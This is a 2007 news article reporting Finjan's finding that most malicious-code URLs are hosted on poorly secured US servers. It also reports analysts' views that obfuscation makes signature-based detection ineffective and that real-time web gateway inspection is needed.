Russia’s Latest Export To America: Malware

Russia may deserve its reputation as ‘virus central.’ After all, it’s the place where viruses are made and sold, complete with a service contract. But where do you suppose all that malicious code ends up? According to security provider Finjan, more of that code ends up on American servers than anywhere else.

In its Q1 2007 Web Security Trends Report, Finjan examined 10 million unique URLs and also investigated the server behind each domain. It found that over 80 percent of the URLs containing malicious code are hosted on servers in the United States, followed by the UK, with 10 percent of the code.

A recent survey by McAfee’s SiteAdvisor found that South Pacific island nations were among the worst offenders when it came to hosting malware , but SiteAdvisor never dug into where the site was actually based, just the top level domain.

Tokelau, the tiny nation of 1,200 people, was among the worst offenders, but its domain registration service is provided by a San Francisco company, and just because you register a .tk domain doesn’t mean the server is actually hosted on the island.

What Finjan found is that while the code may originate in Russia or China, they are finding poorly maintained or secured servers in the U.S. to host it, such as free hosting sites, or just an abandoned site with no one monitoring it.

Either way, it doesn’t reflect well on the U.S., the dominant nation on the Internet, which often points the accusing finger at Russia. “That’s the big surprise. You would expect in the U.S. that this would not happen,” Yuval Ben-Itzhak, CTO for Finjan, told

While it’s usually in out of the way locations or cheap, free hosting sites, malware gets into high profile places, too, such as Wikipedia. And during the Super Bowl this past January, the homepage for Dolphin Stadium in Miami was also infected.

It reflects a losing battle for the good guys, according to one analyst. “It’s hard to secure your stuff. It takes constant effort,” said Peter Firstbrook, research director with Gartner. “I’m a security expert and I don’t know how to secure a server. A small business has no hope in hell. The stuff we’re talking about is a case of the hackers knowing way more than the defenders.”

In looking behind the URL at the site itself, Finjan found that most of the sites pushing malicious code did it through advertising links that are embedded in a page, frame or link. Ben-Itzhak said this makes tracing the malicious code difficult because there is such a lengthy chain of connections to all of these advertisers.

The other big revelation in the Finjan report is that more than 80 percent of malicious code is obfuscated, making pattern matching and signature-based malware detection software useless.

“Given the threat of malicious code and the dynamic nature of the Web, what’s needed is real time inspection technologies to inspect code on the fly as it comes over the wire, not signatures. You need to inspect whatever content is on the wire and not the originator,” he said.

Firstbrook agreed. “More companies need to filter at the Web gateway. Only 15 percent do now, and most do just URL filtering and that’s not effective,” he said.

URL filtering companies may have huge databases of bad URLs, but Firstbrook said the half-life of a phishing site is 20 minutes, making a signature or URL database worthless. “We need the kind of code detection that runs in real time and doesn’t rely on knowing the threat beforehand,” he said.

News Around the Web